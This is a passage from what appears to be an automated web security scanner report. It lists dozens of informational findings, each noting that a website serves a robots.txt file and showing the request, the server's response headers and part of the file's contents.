Expires: Tue, 17 May 2011 11:10:12 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.15 2010/12/29 04:05:07 webchick Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

26.1039. http://www.travelagentcentral.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travelagentcentral.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelagentcentral.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 11 Dec 2010 09:43:22 GMT
ETag: "1bd0068-65b-4971f4d35e280"
Accept-Ranges: bytes
Content-Length: 1627
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

26.1040. http://www.travour.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travour.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travour.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:21 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_jk/1.2.25 mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Thu, 10 Mar 2011 10:45:20 GMT
ETag: "d30006-ba-8ab27000"
Accept-Ranges: bytes
Content-Length: 186
Connection: close
Content-Type: text/plain

# robots.txt for http://www.travour.com/
User-agent: *
Disallow: /cgi-bin/ # This is an infinite virtual URL space
Disallow: /stats/ # these will soon disappear
Disallow: /project/

26.1041. http://www.traxnyc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traxnyc.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.traxnyc.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:51 GMT
Server: Apache
Last-Modified: Mon, 02 May 2011 09:11:05 GMT
ETag: "33de1ba-4f1-4a2476738dc40"
Accept-Ranges: bytes
Content-Length: 1265
Cache-Control: max-age=29030400, private, must-revalidate
Expires: Tue, 03 Apr 2012 10:36:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

### BEGIN FILE ###
#

User-agent: *
#Disallow: /Video/
Disallow: /custom/
Disallow: /tx/
Disallow: /trax/
Disallow: /test/
Disallow: /templates/
Disallow: /sv/
Disallow: /Sitemap/
Disallow
...[SNIP]...

26.1042. http://www.tripplite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tripplite.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tripplite.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 29 Apr 2010 19:35:38 GMT
Accept-Ranges: bytes
ETag: "0211925d3e7ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:38:59 GMT
Connection: close
Content-Length: 2087

# robots.txt file for http://www.tripplite.com/
# 4/14/2009 11:00AM

Sitemap: http://www.tripplite.com/en_sitemap.xml
Sitemap: http://www.tripplite.com/es_sitemap.xml
Sitemap: http://www.trippli
...[SNIP]...

26.1043. http://www.triumphrat.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.triumphrat.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.triumphrat.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:25 GMT
Server: Apache
Last-Modified: Tue, 15 Apr 2008 18:17:24 GMT
Accept-Ranges: bytes
Content-Length: 44
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

26.1044. http://www.troyrecord.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.troyrecord.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.troyrecord.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Tue, 03 May 2011 10:44:07 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 22 Feb 2011 20:40:31 GMT
X-Cache-Info: caching
Real-Hostname: troyrecord.com
Content-Length: 1366

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebo
...[SNIP]...

26.1045. http://www.trumpinitiative.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trumpinitiative.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trumpinitiative.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 10 Mar 2010 21:38:08 GMT
Accept-Ranges: bytes
ETag: "ad287df999c0ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:42:19 GMT
Connection: close
Content-Length: 468

User-agent: *
Disallow: /cflib/
Disallow: /includes/
Disallow: /lib/
Disallow: /login/
Disallow: /mytrumpu/
Disallow: /misc/
Disallow: /misc/cookies.cfm
Disallow: /shop/cart.cfm
Disallow: /sh
...[SNIP]...

26.1046. http://www.trustedhomeservices.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trustedhomeservices.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trustedhomeservices.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:29:09 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Wed, 17 Jun 2009 19:46:01 GMT
ETag: "8062e63d84efc91:1ce1"
Content-Length: 68

User-agent: *
Disallow: /onlinemanuals/
Disallow: /onlinebrochures/

26.1047. http://www.tubedaddy.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tubedaddy.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tubedaddy.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Content-Length: 67
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Crawl-delay:20
Disallow: /click.php
Disallow: /ud.php

26.1048. http://www.tubeguide.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tubeguide.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tubeguide.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.6
Last-Modified: Sat, 04 Apr 2009 20:54:34 GMT
ETag: "ef0a2a-289-df5cd680"
Accept-Ranges: bytes
Content-Length: 649
Cache-Control: max-age=-65453545
Expires: Sun, 05 Apr 2009 20:54:34 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /.htaccess
Disallow: /admin/
Disallow: /cap/
Disallow: /cgi-bin/
Disallow: /includes/
Disallow: /lang/
Disallow: /modules/
Disallow: /template/
Disallow: /cjadmin/
Disallow: /t
...[SNIP]...

26.1049. http://www.tucsonweekly.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tucsonweekly.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tucsonweekly.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:11 GMT
Server: Apache
Last-Modified: Tue, 21 Jul 2009 19:36:27 GMT
ETag: "3fd-4a6618bb"
Accept-Ranges: bytes
Content-Length: 1021
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /gbase/ArticleArchives
Disallow: /gbase/CityWeek/ViewSearch
Disallow: /gbase/EventSearch
Disallow: /gbase/FilmSearch
Disallow: /gbase/LocationSearch
Disallow: /gbase/MovieTime
...[SNIP]...

26.1050. http://www.tunecore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tunecore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tunecore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:51 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 Phusion_Passenger/2.2.9
Last-Modified: Fri, 22 Jan 2010 19:11:46 GMT
ETag: "16e0902-1675-47dc597398080"
Accept-Ranges: bytes
Content-Length: 5749
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/

User-agent: gigabot
Crawl-delay: 120

User-ag
...[SNIP]...

26.1051. http://www.turnbacktogod.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.turnbacktogod.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.turnbacktogod.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:03:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 27 Oct 2010 07:00:58 GMT
Accept-Ranges: bytes
Content-Length: 2734
Cache-Control: max-age=3600, public, must-revalidate, proxy-revalidate
Expires: Tue, 03 May 2011 12:03:39 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
# disallow all files in these directories
Disallow: /cgi-bin/
Disallow: /stats/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/themes/
Disallow: /trackback/
Disallow
...[SNIP]...

26.1052. http://www.tvb.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tvb.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvb.com

Response

HTTP/1.0 200 OK
Server: Apache/2
Last-Modified: Tue, 29 Sep 2009 07:26:24 GMT
ETag: "104007-51-474b254e2e800"-gzip
Content-Type: text/plain
Expires: Tue, 03 May 2011 10:15:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:15:49 GMT
Content-Length: 81
Connection: close

User-agent: *
Disallow: /search.*
Disallow: /search.php
Disallow: /search.html

26.1053. http://www.tvrepairman.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tvrepairman.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvrepairman.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:06:02 GMT
Content-Length: 485
Content-Type: text/plain;charset=utf-8
Set-Cookie: osid=site1~941ec2f7f55a16b823000d9191669fda98893c91; expires=Tue, 03 May 2011 12:06:02 GMT; Path=/
Connection: close

Sitemap: http://www.tvrepairman.com/sitemap.xml

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /privacy
Disallow: /privacypolicy
Disallow: /terms
Disallow: /apps
Disallow: /login
...[SNIP]...

26.1054. http://www.twilightersanonymous.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twilightersanonymous.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.twilightersanonymous.com

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Tue, 03 May 2011 10:30:05 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Fri, 09 Apr 2010 20:43:45 GMT
ETag: "112-483d3d9f6a240"
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Tue, 03 May 2011 11:26:56 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
CF-Cache-Status: HIT
Set-Cookie: __cfduid=d86b05762f19cea9bb28ad6df514d5fe41304418605; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.twilightersanonymous.com
Set-Cookie: __cfduid=d86b05762f19cea9bb28ad6df514d5fe41304418605; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.twilightersanonymous.com

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Di
...[SNIP]...

26.1055. http://www.twoofus.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twoofus.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.twoofus.org

Response

HTTP/1.1 200 OK
Content-Length: 78
Content-Type: text/plain
Last-Modified: Thu, 09 Dec 2010 20:21:17 GMT
Accept-Ranges: bytes
ETag: "873268a2de97cb1:410b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:18 GMT
Connection: close
Set-Cookie: loadbalancer-20480=ENOLOGMOFAAA; Expires=Fri, 30-Apr-2021 10:36:16 GMT; Path=/

User-agent: *
Disallow: /mobile/
Sitemap: http://www.twoofus.org/sitemap.xml

26.1056. http://www.ualmileageplus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ualmileageplus.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ualmileageplus.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:27:58 GMT
Server: Microsoft-IIS/6.0
Content-type: text/plain
Last-modified: Mon, 03 May 2010 12:31:34 GMT
Content-length: 44
Accept-ranges: bytes

# all allowed
User-agent: *
Disallow:

26.1057. http://www.ueuo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ueuo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ueuo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:16:12 GMT
Server: Apache
Last-Modified: Thu, 05 Apr 2007 04:38:56 GMT
ETag: "1a003f-22-42d5626121800"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

26.1058. http://www.ul.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ul.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ul.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 29 Dec 2010 18:55:27 GMT
ETag: "80e5d8-35a-498911cc205c0"
Accept-Ranges: bytes
Content-Length: 858
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-Delay: 5
Disallow: /afci/
Disallow: /ccd/
Disallow: /cf_files/
Disallow: /CFIDE/
Disallow: /councils/
Disallow: /forms/
Disallow: /kids/
Disallow: /ulpix/
Disallow: /ttc/
Disallow:
...[SNIP]...

26.1059. http://www.ultimate-penis-enlargement-guide.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ultimate-penis-enlargement-guide.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ultimate-penis-enlargement-guide.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 11 Dec 2009 19:31:09 GMT
ETag: "9a18ca2-60-47a78f735b940"
Accept-Ranges: bytes
Content-Length: 96
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /poll/
Sitemap: http://ultimate-penis-enlargement-guide.com/sitemap.xml

26.1060. http://www.umassonline.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.umassonline.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.umassonline.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:27 GMT
Server: Apache
Last-Modified: Wed, 22 Dec 2010 20:34:00 GMT
ETag: "15c034-24a-ac4f9e00"
Accept-Ranges: bytes
Content-Length: 586
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /aa/
Disallow: /admin/
Disallow: /ajax/
Disallow: /dinadir/
Disallow: /dinatest/
Disallow: /error/
Disallow: /fe/
Disallow: /js/
Disallow: /loginscripts/
Disallow: /s
...[SNIP]...

26.1061. http://www.uniqlo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uniqlo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uniqlo.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html
Date: Tue, 03 May 2011 10:31:37 GMT
Content-Length: 45
Connection: close

User-Agent: *
Disallow: /award/dryinmotion/

26.1062. http://www.uniquedaily.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uniquedaily.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uniquedaily.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://uniquedaily.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.1063. http://www.unknowncountry.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.unknowncountry.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unknowncountry.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:36 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 10:28:49 GMT
ETag: "284007-85e-49f23d390da40"
Accept-Ranges: bytes
Content-Length: 2142
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:43:36 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.1064. http://www.upmystreet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.upmystreet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.upmystreet.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Tue, 03 May 2011 11:21:28 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.10
Content-Length: 2218
Set-Cookie: uswitch=1778453002.16415.0000; path=/
Vary: Accept-Encoding

User-agent: Googlebot-Image
Disallow:

User-agent: Googlebot-Mobile
Disallow:

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /utilities/
Disallow: /cgi-bin/
Disallo
...[SNIP]...

26.1065. http://www.uprinting.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uprinting.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uprinting.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c-fips PHP/5.2.14
Last-Modified: Sat, 05 Mar 2011 07:16:40 GMT
Accept-Ranges: bytes
Content-Length: 701
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 11:35:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /mm.php
Disallow: /campaigns/
Disallow: /customer/
Disallow: /cart/
Disallow: /cp/
Disallow: /login.html
Disallow: /cart.html
Disallow: /ffr_cart.html
Disallow: /jobs.html
Disa
...[SNIP]...

26.1066. http://www.upskirtphotos.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.upskirtphotos.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.upskirtphotos.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:38:48 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8
Last-Modified: Fri, 15 May 2009 15:32:14 GMT
ETag: "1049311-22-4a0d8afe"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /trade.php

26.1067. http://www.urbanministry.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.urbanministry.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.urbanministry.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 PHP/5.2.16
Last-Modified: Sat, 05 Mar 2011 04:34:14 GMT
ETag: "4ac082b-624-49db4c6555d80"
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 21:55:17 GMT
P3P: CP="HONK"
Content-Type: text/plain
Content-Length: 1572
X-Request-URL: /robots.txt
X-TTL-Extend: YES
X-Extended-TTL: 7d
Date: Tue, 03 May 2011 10:31:26 GMT
X-Varnish: 969512341 968848950
Age: 131769
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 669

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.1068. http://www.ureader.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ureader.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ureader.de

Response

HTTP/1.1 200 OK
Content-Length: 486
Content-Type: text/plain
Last-Modified: Sun, 19 Aug 2007 22:54:43 GMT
Accept-Ranges: bytes
ETag: "807b65eeb3e2c71:329f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:16:18 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

###############################
#
# sample robots.txt file for this website
#
# addresses all robots by using wild card *

User-agent: *

# lis
...[SNIP]...

26.1069. http://www.urnotalone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.urnotalone.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.urnotalone.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 02 Aug 2009 12:58:39 GMT
ETag: "16423c4-ba-47028364f1dc0"
Accept-Ranges: bytes
Content-Length: 186
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/

sitemap: http://urnotalone.com/sitemap.xml
sitemap: http://profiles.urnotalone.com/sitemap-profiles.xml

User-agent: Mediapartners-Google
Disallow:

26.1070. http://www.us-funerals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.us-funerals.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.us-funerals.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 10 Jan 2011 01:46:55 GMT
ETag: "37882be-103-49974248821c0"
Accept-Ranges: bytes
Content-Length: 259
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /404/
Disallow: /images/
Disallow: /generator/
Disallow: /banners/
Disallow: /bloomstoday/
Disallow: /dfs-headers/
Disallow: /form/
Disallow: /funeral-plan
...[SNIP]...

26.1071. http://www.usa-gymnastics.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usa-gymnastics.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usa-gymnastics.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Mar 2011 14:42:21 GMT
ETag: "38ae37-17-6f8a8d40"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.1072. http://www.usacitiesonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usacitiesonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usacitiesonline.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:47 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch mod_perl/1.30
Last-Modified: Mon, 07 Feb 2005 02:49:17 GMT
ETag: "6063bdc-19-4206d72d"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.1073. http://www.usafootball.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usafootball.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usafootball.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:14 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 08 Feb 2011 16:47:06 GMT
ETag: "29610-636-49bc8193c7680"
Accept-Ranges: bytes
Content-Length: 1590
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.1074. http://www.usagovernmentgrants.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usagovernmentgrants.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usagovernmentgrants.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 24 Mar 2011 20:33:23 GMT
Accept-Ranges: bytes
ETag: "8667cbb862eacb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 10:48:32 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

26.1075. http://www.usamilitarymedals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usamilitarymedals.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usamilitarymedals.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:12 GMT
Server: Apache
Last-Modified: Tue, 10 Aug 2010 07:27:20 GMT
Accept-Ranges: bytes
Content-Length: 726
Cache-Control: max-age=315360000
Expires: Fri, 30 Apr 2021 10:16:12 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /product_reviews_write.php
Disallow: /tell_a_friend.php
Disallow: /create_account.php
Disallow: /login.php
Disallow: /myrack.php
Disallow: /rack_shopping_cart
...[SNIP]...

